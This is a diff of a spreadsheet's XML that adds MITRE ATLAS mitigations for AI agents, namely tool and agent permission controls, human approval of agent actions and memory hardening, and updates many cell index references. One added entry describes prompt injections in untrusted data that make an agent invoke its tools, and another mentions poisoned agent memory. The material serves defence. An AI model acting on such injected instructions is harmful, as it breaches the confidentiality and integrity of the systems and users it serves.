+    <t>course-of-action--1d986476-d01e-4eff-a89b-e91edcc3c171</t>
+  </si>
+  <si>
+    <t>course-of-action--020228f8-2cea-4f5b-b589-38b609184f49</t>
+  </si>
+  <si>
+    <t>course-of-action--325643c8-75d3-497b-bef6-5b0cda2a6e66</t>
+  </si>
+  <si>
+    <t>course-of-action--eba11b22-421b-4e1b-aeab-2676b69e81ca</t>
+  </si>
+  <si>
+    <t>course-of-action--41323eda-f2a5-400c-9b20-cf5569bd1ef1</t>
+  </si>
+  <si>
+    <t>course-of-action--1a60c9bc-21a5-4dfe-9efd-c65aa3982fe1</t>
+  </si>
+  <si>
+    <t>course-of-action--ffe6e5df-5a6c-4b9a-8cc8-bef149efca4c</t>
+  </si>
+  <si>
+    <t>course-of-action--b1540dea-06f7-408e-aa46-f62fb5ca9d74</t>
+  </si>
+  <si>
+    <t>course-of-action--c4c7044f-4f3e-42ba-a6d9-ebeedbdaf766</t>
+  </si>
+  <si>
+    <t>course-of-action--279ebf5a-bba3-4fca-80be-de230fe98966</t>
+  </si>
+  <si>
+    <t>course-of-action--c9576e37-7d87-40f2-b446-f82bb77452e6</t>
+  </si>
+  <si>
+    <t>AI Agent Tools Permissions Configuration</t>
   </si>
   <si>
     <t>AI Bill of Materials</t>
@@ -2759,6 +2983,9 @@
     <t>Generative AI Model Alignment</t>
   </si>
   <si>
+    <t>Human In-the-Loop for AI Agent Actions</t>
+  </si>
+  <si>
     <t>Input Restoration</t>
   </si>
   <si>
@@ -2771,12 +2998,21 @@
     <t>Maintain AI Dataset Provenance</t>
   </si>
   <si>
+    <t>Memory Hardening</t>
+  </si>
+  <si>
     <t>Model Hardening</t>
   </si>
   <si>
     <t>Passive AI Output Obfuscation</t>
   </si>
   <si>
+    <t>Privileged AI Agent Permissions Configuration</t>
+  </si>
+  <si>
+    <t>Restrict AI Agent Tool Invocation on Untrusted Data</t>
+  </si>
+  <si>
     <t>Restrict Library Loading</t>
   </si>
   <si>
@@ -2786,6 +3022,9 @@
     <t>Sanitize Training Data</t>
   </si>
   <si>
+    <t>Single-User AI Agent Permissions Configuration</t>
+  </si>
+  <si>
     <t>Use Ensemble Methods</t>
   </si>
   <si>
@@ -2802,6 +3041,9 @@
   </si>
   <si>
     <t>Vulnerability Scanning</t>
+  </si>
+  <si>
+    <t>When deploying tools that will be shared across multiple AI agents, it is important to implement robust policies and controls on permissions for the tools. These controls include applying the principle of least privilege along with delegated access, where the tools receive the permissions, identities, and restrictions of the AI agent calling them. These configurations may be implemented either in MCP servers which connect the agents to the tools calling them or, in more complex cases, directly in the configuration files of the tool.</t>
   </si>
   <si>
     <t>An AI Bill of Materials (AI BOM) contains a full listing of artifacts and resources that were used in building the AI. The AI BOM can help mitigate supply chain risks and enable rapid response to reported vulnerabilities.
@@ -2848,6 +3090,10 @@
 The fine-tuning process can potentially remove built-in safety mechanisms in a generative AI model, but utilizing techniques such as Supervised Fine-Tuning, Reinforcement Learning from Human Feedback or AI Feedback, and Targeted Safety Context Distillation can improve the safety and alignment of the model.</t>
   </si>
   <si>
+    <t>Systems should require the user or another human stakeholder to approve AI agent actions before the agent takes them. The human approver may be technical staff or business unit SMEs depending on the use case. Separate tools, such as dedicated audit agents, may assist human approval, but final adjudication should be conducted by a human decision-maker. 
+The security benefits from Human In-the-Loop policies may be at odds with operational overhead costs of additional approvals. To ease this, Human In-the-Loop policies should follow the degree of consequence of the task at hand. Minor, repetitive tasks performed by agents accessing basic tools may only require minimal human oversight, while agents employed in systems with significant consequences may necessitate approval from multiple stakeholders diversified across multiple organizations.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Preprocess all inference data to nullify or reverse potential adversarial perturbations.
 </t>
   </si>
@@ -2862,11 +3108,21 @@
     <t>Maintain a detailed history of datasets used for AI applications. The history should include information about the dataset's source as well as a complete record of any modifications.</t>
   </si>
   <si>
+    <t>Memory Hardening involves developing trust boundaries and secure processes for how an AI agent stores and accesses memory and context. This may be implemented using a combination of strategies including restricting an agent's ability to store memories by requiring external authentication and validation for memory updates, performing semantic integrity checks on retrieved memories before agents execute actions, and implementing controls for monitoring of memory and remediation processes for poisoned memory.</t>
+  </si>
+  <si>
     <t>Use techniques to make AI models robust to adversarial inputs such as adversarial training or network distillation.</t>
   </si>
   <si>
     <t xml:space="preserve">Decreasing the fidelity of model outputs provided to the end user can reduce an adversaries ability to extract information about the model and optimize attacks for the model.
 </t>
+  </si>
+  <si>
+    <t>AI agents may be granted elevated privileges above that of a normal user to enable desired workflows. When deploying a privileged AI agent, or an agent that interacts with multiple users, it is important to implement robust policies and controls on permissions of the privileged agent. These controls include Role-Based Access Controls (RBAC), Attribute-Based Access Controls (ABAC), and the principle of least privilege so that the agent is only granted the necessary permissions to access tools and resources required to accomplish its designated task(s).</t>
+  </si>
+  <si>
+    <t>Untrusted data can contain prompt injections that invoke an AI agent's tools, potentially causing confidentiality, integrity or availability violations. It is recommended that tool invocation be restricted or limited when untrusted data enters the LLM's context.
+The degree to which tool invocation is restricted may depend on the potential consequences of the action. Consider blocking the automatic invocation of tools or requiring user confirmation once untrusted data enters the LLM's context. For high consequence actions, consider always requiring user confirmation.</t>
   </si>
   <si>
     <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
@@ -2880,6 +3136,9 @@
     <t xml:space="preserve">Detect and remove or remediate poisoned training data.  Training data should be sanitized prior to model training and recurrently for an active learning model.
 Implement a filter to limit ingested training data.  Establish a content policy that would remove unwanted content such as certain explicit or offensive language from being used.
 </t>
+  </si>
+  <si>
+    <t>When deploying an AI agent that acts as a representative of a user and performs actions on their behalf, it is important to implement robust policies and controls on permissions and lifecycle management of the agent. Lifecycle management involves establishing identity, protocols for access management, and decommissioning of the agent when its role is no longer needed. Controls should also include the principle of least privilege and delegated access from the user account. When acting as a representative of a user, the AI agent should not be granted permissions that the user would not be granted within the system or organization.</t>
   </si>
   <si>
     <t xml:space="preserve">Use an ensemble of models for inference to increase robustness to adversarial inputs. Some attacks may effectively evade one model or model family but be ineffective against others.
@@ -2907,6 +3166,9 @@
 Both model artifacts and downstream products produced by models should be scanned for known vulnerabilities.</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0028</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0023</t>
   </si>
   <si>
@@ -2940,6 +3202,9 @@
     <t>https://atlas.mitre.org/mitigations/AML.M0022</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0029</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0010</t>
   </si>
   <si>
@@ -2952,12 +3217,21 @@
     <t>https://atlas.mitre.org/mitigations/AML.M0025</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0031</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0003</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0002</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0026</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0030</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0011</t>
   </si>
   <si>
@@ -2965,6 +3239,9 @@
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0007</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0027</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0006</t>
@@ -3391,7 +3668,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:I131"/>
+  <dimension ref="A1:I141"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0"/>
   </sheetViews>
@@ -3431,28 +3708,28 @@
         <v>9</v>
       </c>
       <c r="B2" t="s">
-        <v>139</v>
+        <v>149</v>
       </c>
       <c r="C2" t="s">
-        <v>269</v>
+        <v>289</v>
       </c>
       <c r="D2" t="s">
-        <v>399</v>
+        <v>429</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>529</v>
+        <v>569</v>
       </c>
       <c r="F2" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G2" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H2" t="s">
-        <v>660</v>
+        <v>710</v>
       </c>
       <c r="I2" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="3" spans="1:9">
@@ -3460,28 +3737,28 @@
         <v>10</v>
       </c>
       <c r="B3" t="s">
-        <v>140</v>
+        <v>150</v>
       </c>
       <c r="C3" t="s">
-        <v>270</v>
+        <v>290</v>
       </c>
       <c r="D3" t="s">
-        <v>400</v>
+        <v>430</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>530</v>
+        <v>570</v>
       </c>
       <c r="F3" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G3" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H3" t="s">
-        <v>661</v>
+        <v>711</v>
       </c>
       <c r="I3" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="4" spans="1:9">
@@ -3489,28 +3766,28 @@
         <v>11</v>
       </c>
       <c r="B4" t="s">
-        <v>141</v>
+        <v>151</v>
       </c>
       <c r="C4" t="s">
-        <v>271</v>
+        <v>291</v>
       </c>
       <c r="D4" t="s">
-        <v>401</v>
+        <v>431</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>531</v>
+        <v>571</v>
       </c>
       <c r="F4" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G4" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H4" t="s">
-        <v>662</v>
+        <v>712</v>
       </c>
       <c r="I4" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="5" spans="1:9">
@@ -3518,28 +3795,28 @@
         <v>12</v>
       </c>
       <c r="B5" t="s">
-        <v>142</v>
+        <v>152</v>
       </c>
       <c r="C5" t="s">
-        <v>272</v>
+        <v>292</v>
       </c>
       <c r="D5" t="s">
-        <v>402</v>
+        <v>432</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>532</v>
+        <v>572</v>
       </c>
       <c r="F5" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G5" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H5" t="s">
-        <v>662</v>
+        <v>712</v>
       </c>
       <c r="I5" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="6" spans="1:9">
@@ -3547,28 +3824,28 @@
         <v>13</v>
       </c>
       <c r="B6" t="s">
-        <v>143</v>
+        <v>153</v>
       </c>
       <c r="C6" t="s">
-        <v>273</v>
+        <v>293</v>
       </c>
       <c r="D6" t="s">
-        <v>403</v>
+        <v>433</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>533</v>
+        <v>573</v>
       </c>
       <c r="F6" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G6" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H6" t="s">
-        <v>663</v>
+        <v>713</v>
       </c>
       <c r="I6" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="7" spans="1:9">
@@ -3576,28 +3853,28 @@
         <v>14</v>
       </c>
       <c r="B7" t="s">
-        <v>144</v>
+        <v>154</v>
       </c>
       <c r="C7" t="s">
-        <v>274</v>
+        <v>294</v>
       </c>
       <c r="D7" t="s">
-        <v>404</v>
+        <v>434</v>
       </c>
       <c r="E7" s="2" t="s">
-        <v>534</v>
+        <v>574</v>
       </c>
       <c r="F7" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G7" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H7" t="s">
-        <v>664</v>
+        <v>714</v>
       </c>
       <c r="I7" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="8" spans="1:9">
@@ -3605,28 +3882,28 @@
         <v>15</v>
       </c>
       <c r="B8" t="s">
-        <v>145</v>
+        <v>155</v>
       </c>
       <c r="C8" t="s">
-        <v>275</v>
+        <v>295</v>
       </c>
       <c r="D8" t="s">
-        <v>405</v>
+        <v>435</v>
       </c>
       <c r="E8" s="2" t="s">
-        <v>535</v>
+        <v>575</v>
       </c>
       <c r="F8" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G8" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H8" t="s">
-        <v>665</v>
+        <v>715</v>
       </c>
       <c r="I8" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="9" spans="1:9">
@@ -3634,28 +3911,28 @@
         <v>16</v>
       </c>
       <c r="B9" t="s">
-        <v>146</v>
+        <v>156</v>
       </c>
       <c r="C9" t="s">
-        <v>276</v>
+        <v>296</v>
       </c>
       <c r="D9" t="s">
-        <v>406</v>
+        <v>436</v>
       </c>
       <c r="E9" s="2" t="s">
-        <v>536</v>
+        <v>576</v>
       </c>
       <c r="F9" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G9" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H9" t="s">
-        <v>666</v>
+        <v>716</v>
       </c>
       <c r="I9" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="10" spans="1:9">
@@ -3663,28 +3940,28 @@
         <v>17</v>
       </c>
       <c r="B10" t="s">
-        <v>147</v>
+        <v>157</v>
       </c>
       <c r="C10" t="s">
-        <v>277</v>
+        <v>297</v>
       </c>
       <c r="D10" t="s">
-        <v>407</v>
+        <v>437</v>
       </c>
       <c r="E10" s="2" t="s">
-        <v>537</v>
+        <v>577</v>
       </c>
       <c r="F10" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G10" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H10" t="s">
-        <v>666</v>
+        <v>716</v>
       </c>
       <c r="I10" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="11" spans="1:9">
@@ -3692,28 +3969,28 @@
         <v>18</v>
       </c>
       <c r="B11" t="s">
-        <v>148</v>
+        <v>158</v>
       </c>
       <c r="C11" t="s">
-        <v>278</v>
+        <v>298</v>
       </c>
       <c r="D11" t="s">
-        <v>408</v>
+        <v>438</v>
       </c>
       <c r="E11" s="2" t="s">
-        <v>538</v>
+        <v>578</v>
       </c>
       <c r="F11" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G11" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H11" t="s">
-        <v>665</v>
+        <v>715</v>
       </c>
       <c r="I11" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="12" spans="1:9">
@@ -3721,28 +3998,28 @@
         <v>19</v>
       </c>
       <c r="B12" t="s">
-        <v>149</v>
+        <v>159</v>
       </c>
       <c r="C12" t="s">
-        <v>279</v>
+        <v>299</v>
       </c>
       <c r="D12" t="s">
-        <v>409</v>
+        <v>439</v>
       </c>
       <c r="E12" s="2" t="s">
-        <v>539</v>
+        <v>579</v>
       </c>
       <c r="F12" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G12" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H12" t="s">
-        <v>663</v>
+        <v>713</v>
       </c>
       <c r="I12" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="13" spans="1:9">
@@ -3750,28 +4027,28 @@
         <v>20</v>
       </c>
       <c r="B13" t="s">
-        <v>150</v>
+        <v>160</v>
       </c>
       <c r="C13" t="s">
-        <v>280</v>
+        <v>300</v>
       </c>
       <c r="D13" t="s">
-        <v>410</v>
+        <v>440</v>
       </c>
       <c r="E13" s="2" t="s">
-        <v>540</v>
+        <v>580</v>
       </c>
       <c r="F13" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G13" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H13" t="s">
-        <v>663</v>
+        <v>713</v>
       </c>
       <c r="I13" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="14" spans="1:9">
@@ -3779,28 +4056,28 @@
         <v>21</v>
       </c>
       <c r="B14" t="s">
-        <v>151</v>
+        <v>161</v>
       </c>
       <c r="C14" t="s">
-        <v>281</v>
+        <v>301</v>
       </c>
       <c r="D14" t="s">
-        <v>411</v>
+        <v>441</v>
       </c>
       <c r="E14" s="2" t="s">
-        <v>541</v>
+        <v>581</v>
       </c>
       <c r="F14" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G14" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H14" t="s">
-        <v>667</v>
+        <v>717</v>
       </c>
       <c r="I14" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="15" spans="1:9">
@@ -3808,28 +4085,28 @@
         <v>22</v>
       </c>
       <c r="B15" t="s">
-        <v>152</v>
+        <v>162</v>
       </c>
       <c r="C15" t="s">
-        <v>282</v>
+        <v>302</v>
       </c>
       <c r="D15" t="s">
-        <v>412</v>
+        <v>442</v>
       </c>
       <c r="E15" s="2" t="s">
-        <v>542</v>
+        <v>582</v>
       </c>
       <c r="F15" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G15" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H15" t="s">
-        <v>668</v>
+        <v>718</v>
       </c>
       <c r="I15" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="16" spans="1:9">
@@ -3837,28 +4114,28 @@
         <v>23</v>
       </c>
       <c r="B16" t="s">
-        <v>153</v>
+        <v>163</v>
       </c>
       <c r="C16" t="s">
-        <v>283</v>
+        <v>303</v>
       </c>
       <c r="D16" t="s">
-        <v>413</v>
+        <v>443</v>
       </c>
       <c r="E16" s="2" t="s">
-        <v>543</v>
+        <v>583</v>
       </c>
       <c r="F16" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G16" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H16" t="s">
-        <v>663</v>
+        <v>713</v>
       </c>
       <c r="I16" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="17" spans="1:9">
@@ -3866,28 +4143,28 @@
         <v>24</v>
       </c>
       <c r="B17" t="s">
-        <v>154</v>
+        <v>164</v>
       </c>
       <c r="C17" t="s">
-        <v>284</v>
+        <v>304</v>
       </c>
       <c r="D17" t="s">
-        <v>414</v>
+        <v>444</v>
       </c>
       <c r="E17" s="2" t="s">
-        <v>544</v>
+        <v>584</v>
       </c>
       <c r="F17" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G17" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H17" t="s">
-        <v>663</v>
+        <v>713</v>
       </c>
       <c r="I17" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="18" spans="1:9">
@@ -3895,28 +4172,28 @@
         <v>25</v>
       </c>
       <c r="B18" t="s">
-        <v>155</v>
+        <v>165</v>
       </c>
       <c r="C18" t="s">
-        <v>285</v>
+        <v>305</v>
       </c>
       <c r="D18" t="s">
-        <v>415</v>
+        <v>445</v>
       </c>
       <c r="E18" s="2" t="s">
-        <v>545</v>
+        <v>585</v>
       </c>
       <c r="F18" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G18" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H18" t="s">
-        <v>669</v>
+        <v>719</v>
       </c>
       <c r="I18" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="19" spans="1:9">
@@ -3924,28 +4201,28 @@
         <v>26</v>
       </c>
       <c r="B19" t="s">
-        <v>156</v>
+        <v>166</v>
       </c>
       <c r="C19" t="s">
-        <v>286</v>
+        <v>306</v>
       </c>
       <c r="D19" t="s">
-        <v>416</v>
+        <v>446</v>
       </c>
       <c r="E19" s="2" t="s">
-        <v>546</v>
+        <v>586</v>
       </c>
       <c r="F19" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G19" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H19" t="s">
-        <v>669</v>
+        <v>720</v>
       </c>
       <c r="I19" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="20" spans="1:9">
@@ -3953,28 +4230,28 @@
         <v>27</v>
       </c>
       <c r="B20" t="s">
-        <v>157</v>
+        <v>167</v>
       </c>
       <c r="C20" t="s">
-        <v>287</v>
+        <v>307</v>
       </c>
       <c r="D20" t="s">
-        <v>417</v>
+        <v>447</v>
       </c>
       <c r="E20" s="2" t="s">
-        <v>547</v>
+        <v>587</v>
       </c>
       <c r="F20" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G20" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H20" t="s">
-        <v>670</v>
+        <v>720</v>
       </c>
       <c r="I20" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="21" spans="1:9">
@@ -3982,28 +4259,28 @@
         <v>28</v>
       </c>
       <c r="B21" t="s">
-        <v>158</v>
+        <v>168</v>
       </c>
       <c r="C21" t="s">
-        <v>288</v>
+        <v>308</v>
       </c>
       <c r="D21" t="s">
-        <v>418</v>
+        <v>448</v>
       </c>
       <c r="E21" s="2" t="s">
-        <v>548</v>
+        <v>588</v>
       </c>
       <c r="F21" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G21" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H21" t="s">
-        <v>667</v>
+        <v>719</v>
       </c>
       <c r="I21" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="22" spans="1:9">
@@ -4011,28 +4288,28 @@
         <v>29</v>
       </c>
       <c r="B22" t="s">
-        <v>159</v>
+        <v>169</v>
       </c>
       <c r="C22" t="s">
-        <v>289</v>
+        <v>309</v>
       </c>
       <c r="D22" t="s">
-        <v>419</v>
+        <v>449</v>
       </c>
       <c r="E22" s="2" t="s">
-        <v>549</v>
+        <v>589</v>
       </c>
       <c r="F22" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G22" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H22" t="s">
-        <v>671</v>
+        <v>717</v>
       </c>
       <c r="I22" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="23" spans="1:9">
@@ -4040,28 +4317,28 @@
         <v>30</v>
       </c>
       <c r="B23" t="s">
-        <v>160</v>
+        <v>170</v>
       </c>
       <c r="C23" t="s">
-        <v>290</v>
+        <v>310</v>
       </c>
       <c r="D23" t="s">
-        <v>420</v>
+        <v>450</v>
       </c>
       <c r="E23" s="2" t="s">
-        <v>550</v>
+        <v>590</v>
       </c>
       <c r="F23" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G23" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H23" t="s">
-        <v>663</v>
+        <v>721</v>
       </c>
       <c r="I23" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="24" spans="1:9">
@@ -4069,28 +4346,28 @@
         <v>31</v>
       </c>
       <c r="B24" t="s">
-        <v>161</v>
+        <v>171</v>
       </c>
       <c r="C24" t="s">
-        <v>291</v>
+        <v>311</v>
       </c>
       <c r="D24" t="s">
-        <v>421</v>
+        <v>451</v>
       </c>
       <c r="E24" s="2" t="s">
-        <v>551</v>
+        <v>591</v>
       </c>
       <c r="F24" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G24" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H24" t="s">
-        <v>670</v>
+        <v>713</v>
       </c>
       <c r="I24" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="25" spans="1:9">
@@ -4098,28 +4375,28 @@
         <v>32</v>
       </c>
       <c r="B25" t="s">
-        <v>162</v>
+        <v>172</v>
       </c>
       <c r="C25" t="s">
-        <v>292</v>
+        <v>312</v>
       </c>
       <c r="D25" t="s">
-        <v>422</v>
+        <v>452</v>
       </c>
       <c r="E25" s="2" t="s">
-        <v>552</v>
+        <v>592</v>
       </c>
       <c r="F25" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G25" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H25" t="s">
-        <v>670</v>
+        <v>719</v>
       </c>
       <c r="I25" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="26" spans="1:9">
@@ -4127,28 +4404,28 @@
         <v>33</v>
       </c>
       <c r="B26" t="s">
-        <v>163</v>
+        <v>173</v>
       </c>
       <c r="C26" t="s">
-        <v>293</v>
+        <v>313</v>
       </c>
       <c r="D26" t="s">
-        <v>423</v>
+        <v>453</v>
       </c>
       <c r="E26" s="2" t="s">
-        <v>553</v>
+        <v>593</v>
       </c>
       <c r="F26" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G26" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H26" t="s">
-        <v>664</v>
+        <v>719</v>
       </c>
       <c r="I26" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="27" spans="1:9">
@@ -4156,28 +4433,28 @@
         <v>34</v>
       </c>
       <c r="B27" t="s">
-        <v>164</v>
+        <v>174</v>
       </c>
       <c r="C27" t="s">
-        <v>294</v>
+        <v>314</v>
       </c>
       <c r="D27" t="s">
-        <v>424</v>
+        <v>454</v>
       </c>
       <c r="E27" s="2" t="s">
-        <v>554</v>
+        <v>594</v>
       </c>
       <c r="F27" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G27" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H27" t="s">
-        <v>669</v>
+        <v>714</v>
       </c>
       <c r="I27" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="28" spans="1:9">
@@ -4185,28 +4462,28 @@
         <v>35</v>
       </c>
       <c r="B28" t="s">
-        <v>165</v>
+        <v>175</v>
       </c>
       <c r="C28" t="s">
-        <v>295</v>
+        <v>315</v>
       </c>
       <c r="D28" t="s">
-        <v>425</v>
+        <v>455</v>
       </c>
       <c r="E28" s="2" t="s">
-        <v>555</v>
+        <v>595</v>
       </c>
       <c r="F28" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G28" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H28" t="s">
-        <v>669</v>
+        <v>720</v>
       </c>
       <c r="I28" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="29" spans="1:9">
@@ -4214,28 +4491,28 @@
         <v>36</v>
       </c>
       <c r="B29" t="s">
-        <v>166</v>
+        <v>176</v>
       </c>
       <c r="C29" t="s">
-        <v>296</v>
+        <v>316</v>
       </c>
       <c r="D29" t="s">
-        <v>426</v>
+        <v>456</v>
       </c>
       <c r="E29" s="2" t="s">
-        <v>556</v>
+        <v>596</v>
       </c>
       <c r="F29" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G29" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H29" t="s">
-        <v>672</v>
+        <v>720</v>
       </c>
       <c r="I29" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="30" spans="1:9">
@@ -4243,28 +4520,28 @@
         <v>37</v>
       </c>
       <c r="B30" t="s">
-        <v>167</v>
+        <v>177</v>
       </c>
       <c r="C30" t="s">
-        <v>297</v>
+        <v>317</v>
       </c>
       <c r="D30" t="s">
-        <v>427</v>
+        <v>457</v>
       </c>
       <c r="E30" s="2" t="s">
-        <v>557</v>
+        <v>597</v>
       </c>
       <c r="F30" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G30" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H30" t="s">
-        <v>666</v>
+        <v>722</v>
       </c>
       <c r="I30" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="31" spans="1:9">
@@ -4272,28 +4549,28 @@
         <v>38</v>
       </c>
       <c r="B31" t="s">
-        <v>168</v>
+        <v>178</v>
       </c>
       <c r="C31" t="s">
-        <v>298</v>
+        <v>318</v>
       </c>
       <c r="D31" t="s">
-        <v>428</v>
+        <v>458</v>
       </c>
       <c r="E31" s="2" t="s">
-        <v>558</v>
+        <v>598</v>
       </c>
       <c r="F31" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="G31" t="s">
-        <v>659</v>
+        <v>709</v>
       </c>
       <c r="H31" t="s">
-        <v>662</v>
+        <v>716</v>
       </c>
       <c r="I31" t="s">
-        <v>679</v>
+        <v>731</v>
       </c>
     </row>
     <row r="32" spans="1:9">
@@ -4301,28 +4578,28 @@
         <v>39</v>
       </c>
       <c r="B32" t="s">
-        <v>169</v>
+        <v>179</v>
       </c>
       <c r="C32" t="s">
-        <v>299</v>
+        <v>319</v>
       </c>
       <c r="D32" t="s">
-        <v>429</v>
+        <v>459</v>
       </c>
       <c r="E32" s="2" t="s">
